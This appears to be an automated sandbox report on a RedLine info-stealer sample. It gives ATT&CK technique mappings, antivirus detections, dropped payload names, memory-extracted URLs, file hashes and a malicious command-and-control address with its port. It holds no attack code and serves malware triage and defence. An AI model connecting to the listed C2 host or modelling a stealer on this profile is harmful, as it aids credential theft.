                    Default Accounts | 3 Native API | Boot or Logon Initialization Scripts | 1 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | 3 Data from Local System | Exfiltration Over Bluetooth | 1 Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                    Domain Accounts | 2 Command and Scripting Interpreter | Logon Script (Windows) | Logon Script (Windows) | 3 Obfuscated Files or Information | Security Account Manager | 137 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 2 Software Packing | NTDS | 361 Security Software Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
                    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 231 Virtualization/Sandbox Evasion | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                    Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Masquerading | Cached Domain Credentials | 12 Process Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                    External Remote Services | Scheduled Task | Startup Items | Startup Items | 231 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                    Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                    Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 Process Injection | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
                    Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | 1 Rundll32 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
                    Source | Detection | Scanner | Label | Link
                    W7ANVukbbj.exe | 72% | ReversingLabs | Win32.Trojan.RedLine |
                    W7ANVukbbj.exe | 49% | Virustotal | | Browse
                    W7ANVukbbj.exe | 100% | Avira | HEUR/AGEN.1252166 |
                    W7ANVukbbj.exe | 100% | Joe Sandbox ML | |

                    Source | Detection | Scanner | Label | Link
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe | 100% | Avira | HEUR/AGEN.1252166 |
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe | 64% | ReversingLabs | Win32.Trojan.Seraph |
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe | 77% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate |

                    Source | Detection | Scanner | Label | Link | Download
                    14.0.uPD30tM82.exe.2b0000.0.unpack | 100% | Avira | HEUR/AGEN.1252166 | | Download File
                    0.0.W7ANVukbbj.exe.860000.0.unpack | 100% | Avira | HEUR/AGEN.1252166 | | Download File
                    0.2.W7ANVukbbj.exe.860000.0.unpack | 100% | Avira | HEUR/AGEN.1252166 | | Download File

                    No Antivirus matches
                    No contacted domains info
                    Name | Malicious | Antivirus Detection | Reputation
                    193.233.20.23:4123 | true | Avira URL Cloud: safe | unknown
                                                                high
                                                                http://tempuri.org/Entity/Id6Responsetwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeytwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://api.ip.sb/ipW7ANVukbbj.exe, 00000000.00000003.254929355.0000000004A26000.00000004.00000020.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.322917583.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.322488235.0000000002F56000.00000004.00000020.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.333480133.00000000076C0000.00000004.08000000.00040000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000000.337013680.00000000002B2000.00000002.00000001.01000000.00000008.sdmp, uPD30tM82.exe.0.drfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://schemas.xmlsoap.org/ws/2004/04/sctwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCtwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Canceltwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://tempuri.org/Entity/Id9Responsetwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=uPD30tM82.exe, 0000000E.00000002.440661066.00000000036BC000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.000000000371D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://tempuri.org/Entity/Id20twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://tempuri.org/Entity/Id21twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://tempuri.org/Entity/Id22twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issuetwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://tempuri.org/Entity/Id1Responsetwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=twl97yF91.exe, 00000001.00000002.326658615.0000000005FBA000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004EC5000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005E41000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005EA2000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000006060000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005DE1000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005F1F000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005F9D000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.000000000601B000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.000000000506B000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004FDE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004F52000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005EBF000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005F3C000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.00000000050F8000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005DA0000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000006038000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.0000000003819000.00000004.00000800.00020000.00000000.sdmp, 
uPD30tM82.exe, 0000000E.00000002.440661066.000000000373A000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.0000000003911000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000275B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedtwl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlytwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Replaytwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegotwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binarytwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCtwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeytwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2004/08/addressingtwl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuetwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Completiontwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/trusttwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://tempuri.org/Entity/Id10twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://tempuri.org/Entity/Id11twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://tempuri.org/Entity/Id12twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://tempuri.org/Entity/Id16Responsetwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002A27000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponsetwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Canceltwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://tempuri.org/Entity/Id13twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://tempuri.org/Entity/Id14twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://tempuri.org/Entity/Id15twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://tempuri.org/Entity/Id16twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/Noncetwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://tempuri.org/Entity/Id17twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://tempuri.org/Entity/Id18twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://tempuri.org/Entity/Id5Responsetwl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://tempuri.org/Entity/Id19twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnstwl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://tempuri.org/Entity/Id10Responsetwl97yF91.exe, 00000001.00000002.323169357.0000000005105000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000005199000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002A27000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/Renewtwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/rm8Dtwl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://tempuri.org/Entity/Id8Responsetwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 193.233.20.23 | unknown | Russian Federation | 8749 | REDCOM-ASRedcomKhabarovskRussiaRU | true |
Joe Sandbox Version:36.0.0 Rainbow Opal
Analysis ID:815798
Start date and time:2023-02-27 09:29:18 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 10m 52s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:37
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample file name:W7ANVukbbj.exe
Original Sample Name:093a149ea955420c85d54127e964879a.exe
Detection:MAL
Classification:mal100.troj.spyw.evad.winEXE@6/4@0/1
EGA Information:
• Successful, ratio: 66.7%
HDC Information:
• Successful, ratio: 28.1% (good quality ratio 27%)
• Quality average: 85%
• Quality standard deviation: 24.5%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 134
• Number of non-executed functions: 66
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240s for rundll32
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Execution Graph export aborted for target uPD30tM82.exe, PID 5176 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
| Time | Type | Description |
|---|---|---|
| 09:30:45 | API Interceptor | 11x Sleep call for process: twl97yF91.exe modified |
| 09:31:34 | API Interceptor | 27x Sleep call for process: uPD30tM82.exe modified |
| Match | Associated Sample Name / URL | Detection | Threat Name |
|---|---|---|---|
| 193.233.20.23 | IBeoz2lT1O.exe | malicious | Amadey, RedLine |
| | O3m4OQha7t.exe | malicious | Amadey, RedLine |
| | cKulR3hExf.exe | malicious | RedLine |
| | j0PvFMsaPX.exe | malicious | RedLine |
| | Qt5NzBQSp3.exe | malicious | RedLine |
| | 7B4JTs3B6G.exe | malicious | RedLine |
| | 9sqZDwVLWx.exe | malicious | RedLine |
| | file.exe | malicious | RedLine |
| | sPgGBA7Yuf.exe | malicious | RedLine |
| | lkpILPqpDR.exe | malicious | RedLine |
| | i2vX2df3mr.exe | malicious | RedLine |
| | 07XNY4shKd.exe | malicious | RedLine |
| | rkTCM8bhBN.exe | malicious | RedLine |
| | file.exe | malicious | RedLine |
| | file.exe | malicious | RedLine |
| | file.exe | malicious | RedLine |
| | file.exe | malicious | RedLine |
| | file.exe | malicious | RedLine |
| | file.exe | malicious | RedLine |
| | file.exe | malicious | RedLine |

No context
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| REDCOM-ASRedcomKhabarovskRussiaRU | IBeoz2lT1O.exe | malicious | Amadey, RedLine | 193.233.20.23 |
| | O3m4OQha7t.exe | malicious | Amadey, RedLine | 193.233.20.23 |
| | cKulR3hExf.exe | malicious | RedLine | 193.233.20.23 |
| | j0PvFMsaPX.exe | malicious | RedLine | 193.233.20.23 |
| | Qt5NzBQSp3.exe | malicious | RedLine | 193.233.20.23 |
| | 7B4JTs3B6G.exe | malicious | RedLine | 193.233.20.23 |
| | 9sqZDwVLWx.exe | malicious | RedLine | 193.233.20.23 |
| | file.exe | malicious | RedLine | 193.233.20.23 |
| | sPgGBA7Yuf.exe | malicious | RedLine | 193.233.20.23 |
| | lkpILPqpDR.exe | malicious | RedLine | 193.233.20.23 |
| | i2vX2df3mr.exe | malicious | RedLine | 193.233.20.23 |
| | 07XNY4shKd.exe | malicious | RedLine | 193.233.20.23 |
| | rkTCM8bhBN.exe | malicious | RedLine | 193.233.20.23 |
| | file.exe | malicious | RedLine | 193.233.20.23 |
| | file.exe | malicious | RedLine | 193.233.20.23 |
| | file.exe | malicious | RedLine | 193.233.20.23 |
| | file.exe | malicious | RedLine | 193.233.20.23 |
| | file.exe | malicious | RedLine | 193.233.20.23 |
| | file.exe | malicious | RedLine | 193.233.20.23 |
| | file.exe | malicious | RedLine | 193.233.20.23 |

No context
Match: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe
Associated Sample Name / URL:
• Filename: O3m4OQha7t.exe, Detection: malicious, Threat Name: Amadey, RedLine
• Filename: 9sqZDwVLWx.exe, Detection: malicious, Threat Name: RedLine
• Filename: sPgGBA7Yuf.exe, Detection: malicious, Threat Name: RedLine
• Filename: file.exe, Detection: malicious, Threat Name: Amadey, RedLine
• Filename: file.exe, Detection: malicious, Threat Name: Amadey, RedLine
• Filename: file.exe, Detection: malicious, Threat Name: Amadey, RedLine
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe
                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2843
                                                                                                                                                                                                        Entropy (8bit):5.3371553026862095
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:MIHK5HKXeHKlEHU0YHKhQnouHIWUfHKhBHKdHKBfHK5AHKzvQTHmtHoxHImHKx1V:Pq5qXeqm00YqhQnouOqLqdqNq2qzcGtD
                                                                                                                                                                                                        MD5:6EBF0252D03294EB58BEA14A4F15FFEB
                                                                                                                                                                                                        SHA1:785B5C722C8DA926BDAFCCE4D1E496B0107AD1BA
